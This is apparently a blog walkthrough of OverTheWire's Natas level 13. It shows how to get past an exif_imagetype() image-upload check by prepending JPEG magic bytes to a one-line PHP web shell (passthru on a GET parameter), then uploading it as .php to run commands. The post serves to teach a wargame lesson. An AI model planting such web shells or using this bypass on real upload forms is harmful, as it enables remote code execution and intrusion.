In this post we’re going to be looking at Level 13 of the Natas wargame hosted by Over The Wire.
What’s Going On?
Upon logging in, we see nearly the same setup as in level 12, except for the statement that uploading is restricted to image files only. To determine how, let’s take a look at the source code. Viewing the source code, we can see that it is nearly all identical, except for two lines. There is now a new added check on the file being uploaded. This check uses the exif_imagetype() function to determine if the file being uploaded is an image file or not. If it isn’t, an error is printed to the screen and the file isn’t uploaded. Of course, if it is determined to be an image file, the file is uploaded and a link to it is printed to the screen. So, since this level checks the file’s type, what can we do with it?
Exploit
Lets RTFM for exif_imagetype(). Doing so we can see that it says it “reads the first bytes of an image and checks its signature.” Ok, neat. But what can we do with that? Well, if we take the time (seconds) to Google something like “first bytes of jpg” and click on the 3rd link, we might just find a site that tells us that “a JPEG image file is always found to hold the value FF D8 FF E0 (Hex) in the first four bytes.” Great. So now we need to construct a file with those four specific hex bytes as the first four bytes of the file, and end it with our PHP snippet from last level.
So, to input the hex data, let’s jump to our Linux command line. To input hex and php into a file, let’s use the following commands:
[somebox]$ echo ‘FFD8FFE0’ | xxd -r -p >> natas13attackfile.php
[somebox]$ echo “<? passthru(\$_GET[‘h’]); ?>” >> natas13attackfile.php
We should now have our correctly crafted “image” file. Now, we simply have to follow what we did in the last level to upload it. Download the current level’s HTML, alter the action URL in the form declaration and change the filename field’s value to a .php extension. Now, use your browser to log into the natas13 website, then use your local page to submit the upload file. After upload, follow the link and perform the same command as last time, except this time let’s check out the natas14 file! Upon execution, this tactic works, and the Level 14 password is revealed.
So What?
In an attempt to limit file type uploads to images, this level uses exif_imagetype(). However, this function only looks for certain bytes of the file. Additionally, PHP only evaluates certain parts of files, specifically that between <? and ?>. Because of this, we were still able to get a file that has the first bytes of an image, and later has valid PHP within PHP tags. Also, this level didn’t fix the problem of being able to upload a file with a PHP extension, causing it to run through the PHP interpreter. These things together result in the vulnerability we were able to exploit and thus show, this isn’t the safe way to accept user files.